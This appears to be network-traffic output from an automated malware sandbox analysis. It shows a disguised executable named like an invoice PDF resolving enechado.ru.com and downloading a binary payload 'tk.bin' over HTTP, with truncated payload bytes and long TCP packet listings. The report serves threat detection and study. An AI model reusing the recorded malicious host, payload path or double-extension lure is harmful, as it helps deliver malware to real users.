                                            Nov 25, 2024 10:27:37.101555109 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.104496956 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.104552984 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.104640961 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.104685068 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.107556105 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.107618093 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.107650042 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.107690096 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.110584021 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.110636950 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.110699892 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.110744953 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.113656998 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.113729000 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.113755941 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.113811970 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.116730928 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.116775036 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.116976023 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.117014885 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.119808912 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.119853020 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.119911909 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.119950056 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.122838974 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.122879982 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.122951984 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.123012066 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.125979900 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.126027107 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.126041889 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.126079082 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.129000902 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.129044056 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.129106045 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.129160881 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.132020950 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.132097960 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.132153034 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.132200003 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.135138988 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.135183096 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.135322094 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.135360003 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.138173103 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.138226986 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.138531923 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.138571024 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.141311884 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.141357899 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.141444921 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.141486883 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.144419909 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.144458055 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.144486904 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.144525051 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.147402048 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.147453070 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.147520065 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.147559881 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.150422096 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.150471926 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.150594950 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.150640965 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.153594017 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.153655052 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.153666019 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.153707027 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.156517029 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.156575918 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.272984982 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.273020983 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.273051977 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.273068905 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.274029016 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.274075985 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.274122953 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.274168015 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.276400089 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.276451111 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.277268887 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.277313948 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.277354002 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.277394056 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.279650927 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.279707909 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.279743910 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.279784918 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.282001019 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.282052040 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.282085896 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.282129049 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.284392118 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.284446001 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.284501076 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.284547091 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.286676884 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.286747932 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.286817074 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.286870956 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.289010048 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.289072990 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.289104939 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.289155006 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.291342020 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.291388988 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.291449070 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.291502953 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.293657064 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.293704033 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.293823004 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.293874025 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.296148062 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.296159029 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.296216011 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.298358917 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.298418999 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.298451900 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.298496962 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.300666094 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.300715923 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.300776958 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.300822973 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.303184032 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.303241968 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.303251982 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.303299904 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.305366039 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.305438995 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.305504084 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.305552006 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.307818890 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.307882071 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.307917118 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.307961941 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.310117960 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.310228109 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.310250998 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.310269117 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.312331915 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.312392950 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.312453032 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.312498093 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.314699888 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.314749956 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.314821005 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.314863920 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.317004919 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.317056894 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.317071915 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.317114115 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.319366932 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.319425106 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.319482088 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.319524050 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.321708918 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.321721077 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.321773052 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.324047089 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.324106932 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.324141026 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.324188948 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.326348066 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.326392889 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.326468945 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.326509953 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.328752995 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.328804016 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.328834057 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.328872919 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.331024885 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.331104994 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.331135035 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.331176996 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.333391905 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.333440065 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.333498001 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.333534956 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.335699081 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.335752964 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.335767031 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.335810900 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.338010073 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.338051081 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.338166952 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.338217020 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.340389967 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.340451002 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.340481043 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.340528011 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.342786074 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.342799902 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.342840910 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.345041990 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.345083952 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.345210075 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.345251083 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.347378969 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.347419977 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.347527981 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.347568035 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.349701881 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.349752903 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.349817991 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.349862099 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.352077961 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.352128983 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.352163076 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.352201939 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.354362011 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.354406118 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.354439020 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.354475021 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.356699944 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.356744051 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.356745958 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.356784105 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.359113932 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.359159946 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.359204054 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.359246016 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.361393929 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.361439943 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.361502886 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.361541986 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.363692999 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.363739967 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.363848925 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.363893032 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.366039038 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.366087914 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.366147995 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.366185904 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.368443012 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.368489027 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.368511915 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.368552923 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.370724916 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.370770931 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.370809078 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.370851994 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.373087883 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.373135090 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.373162031 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.373203993 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.375382900 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.375430107 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.375494003 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.375535011 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.377697945 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.377746105 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.377824068 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.377867937 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.380073071 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.380120993 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.380156040 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.380203962 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.382394075 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.382438898 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.382472992 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.382517099 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.384738922 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.384783030 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:37.384790897 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:37.384825945 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:27:41.669876099 CET8049813103.83.194.50192.168.2.4
                                            Nov 25, 2024 10:27:41.669950008 CET4981380192.168.2.4103.83.194.50
                                            Nov 25, 2024 10:28:07.120486021 CET4981380192.168.2.4103.83.194.50

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 25, 2024 10:27:33.960083961 CET5459953192.168.2.41.1.1.1
                                            Nov 25, 2024 10:27:34.951534033 CET5459953192.168.2.41.1.1.1
                                            Nov 25, 2024 10:27:34.974417925 CET53545991.1.1.1192.168.2.4
                                            Nov 25, 2024 10:27:35.088555098 CET53545991.1.1.1192.168.2.4

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Nov 25, 2024 10:27:33.960083961 CET192.168.2.41.1.1.10xf49Standard query (0)enechado.ru.comA (IP address)IN (0x0001)false
                                            Nov 25, 2024 10:27:34.951534033 CET192.168.2.41.1.1.10xf49Standard query (0)enechado.ru.comA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Nov 25, 2024 10:27:34.974417925 CET1.1.1.1192.168.2.40xf49No error (0)enechado.ru.com103.83.194.50A (IP address)IN (0x0001)false
                                            Nov 25, 2024 10:27:35.088555098 CET1.1.1.1192.168.2.40xf49No error (0)enechado.ru.com103.83.194.50A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • enechado.ru.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.449813103.83.194.50802648C:\Users\user\Desktop\Rendel#U00e9si sz#U00e1m 11-2024-pdf.bat.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 25, 2024 10:27:35.099689960 CET166OUTGET /tk.bin HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                            Host: enechado.ru.com
                                            Cache-Control: no-cache
                                            Nov 25, 2024 10:27:36.431057930 CET1236INHTTP/1.1 200 OK
                                            Date: Mon, 25 Nov 2024 09:27:36 GMT
                                            Server: Apache
                                            Last-Modified: Mon, 25 Nov 2024 02:40:55 GMT
                                            Accept-Ranges: bytes
                                            Content-Length: 289856
                                            Content-Type: application/octet-stream
                                            Data Raw: e5 f1 c3 36 10 09 7e 10 91 e9 81 8b 2c 6b f5 d8 8b 21 eb 5d d6 e0 5b a3 a3 1a ad ba ee 91 22 6c 7b b8 78 4e 9a 46 69 7d a4 cd 27 52 f6 ce d5 29 29 52 1f c8 43 0d 84 be b4 62 44 57 31 78 88 d0 ed d2 67 4f 25 ca 44 e9 85 d6 66 3a 7f f0 85 68 86 d9 62 e3 38 94 68 94 93 6b a4 42 38 27 01 e9 0b d9 de 62 10 2d 8d 2e a6 9a 50 76 07 68 5f 41 18 ff c1 5b 9d a6 4a d9 ab d0 db 71 fd 29 dc ae cf f1 ef ff 95 58 97 03 6c 1a d1 ea 3f 0c 57 51 aa b8 af 96 56 b2 5a 8a 84 73 0a b2 fc 65 96 c5 94 fa 01 0e 40 98 9c 6f a0 42 d6 a8 23 27 4c 6a e6 b1 da bf 4e e9 d5 94 d4 34 12 0a 52 ce 3d 5e d2 aa 1d a2 fa d8 98 61 a8 79 6c 64 46 fb fc 6a 86 85 d3 0b 91 dd d3 3f 30 31 a5 34 27 da 75 34 a5 28 cd 24 0b 15 ee fa 54 69 4f b8 a8 d9 37 bf 0a ef 84 98 1d 2b f7 f9 c7 a4 a7 45 81 ff d6 73 97 44 2d c4 82 a6 84 b1 c7 77 35 ee f2 d7 a8 8a 57 9e 76 2b f2 eb aa eb 5f 5b 28 43 ce 72 11 c7 88 60 5b a8 99 78 cd 74 eb 90 57 04 72 25 38 7a e8 0f c7 e8 17 c5 ee 4a 07 99 e8 c0 8c ea 72 36 88 f1 6d 21 7e 1d f2 2e ce 77 44 72 87 90 e0 4d 4c 3e [TRUNCATED]
                                            Data Ascii: 6~,k!]["l{xNFi}'R))RCbDW1xgO%Df:hb8hkB8'b-.Pvh_A[Jq)Xl?WQVZse@oB#'LjN4R=^ayldFj?014'u4($TiO7+EsD-w5Wv+_[(Cr`[xtWr%8zJr6m!~.wDrML>Z",d!Ki313?>X="v/OfVoZ?<a_;(Y7inpQY)!o{GG-KJ<L+l?J>?hdO&nDr3"ajq(DuIo`o]4z%zdQO!eW1+n}wIb:amsyxelF^4`Sfk/!^Sd?i:n}yKE8;/!~VvH|@M_/2'@nQ=R`Szg}14{!O$sF%Ux@%MX<I&Bid*=i+}o}<Fq?N<6H8/v<y01uu5T^x%b5ioPBk%VT9Qt\[7/}]>gl,SY][v3kHJK@:7NO([k%P;Z%*zIv.G^\NLBeHj- [TRUNCATED]
                                            Nov 25, 2024 10:27:36.431122065 CET1236INData Raw: 55 71 14 85 f8 bd 54 fc e2 5b 6e 2e 97 f2 cb 78 ed 1d a9 ad e9 d4 ea a6 63 33 82 8e f6 b2 bb 0d 4d 7b ab cc aa ac 52 34 e1 71 85 ac 9c 52 6b ec a7 65 ab a7 c4 f2 e9 1e 8c 0e 62 83 6a b1 4e 41 77 e1 e9 b1 05 e5 25 9a a7 0b 81 db b9 c7 04 ab bc 16
                                            Data Ascii: UqT[n.xc3M{R4qRkebjNAw%8yw,p>Rqd3o\9zde8Oi'Qy'(M$Ci&s(8IU8;TKxGl$K*R|_Dz5W91Ry
                                            Nov 25, 2024 10:27:36.431134939 CET1236INData Raw: 3e 5a 22 2e 89 e4 e5 21 0e b7 4b bf 79 bd 18 c1 33 8a 91 31 01 82 33 f3 af 3f f1 1b 3e 58 e8 0d 3d 22 76 81 a3 1a d0 2f 4f c9 66 56 10 6f 5a 00 3f a5 3c c1 a7 fc 61 5f 3b b5 c3 aa 8b 28 59 37 85 9c a1 c9 dd ee 69 82 8e 15 aa 6e f7 70 a0 bc 51 bf
                                            Data Ascii: >Z".!Ky313?>X="v/OfVoZ?<a_;(Y7inpQY)!o{GG-KJ<L+l?J>?hdO&nD3W&aj+8DuIoo]4z%zdQO!eW1+n
                                            Nov 25, 2024 10:27:36.431181908 CET1236INData Raw: ff a8 03 62 69 80 70 d2 60 87 73 ef 8a 15 8f 16 79 50 9b 32 f2 8b 09 80 93 e5 d9 15 80 7a cb a9 e5 2d cd 37 5d 2b 8d e9 d0 ca 6e 1c 83 fa e4 80 9f 0c 2b f7 fa ad e9 f7 6d 18 45 f2 43 c2 c6 f7 5c 81 2f 57 55 ce ba 9d 9d 3c d3 15 dc a9 94 1b 25 cc
                                            Data Ascii: bip`syP2z-7]+n+mEC\/WU<%Hn"R$qkF+@kVy&l,E{/_h2[g}a`gp;psb;h YB#'~7E9i\_{KrWN4DUTh4_soNb,
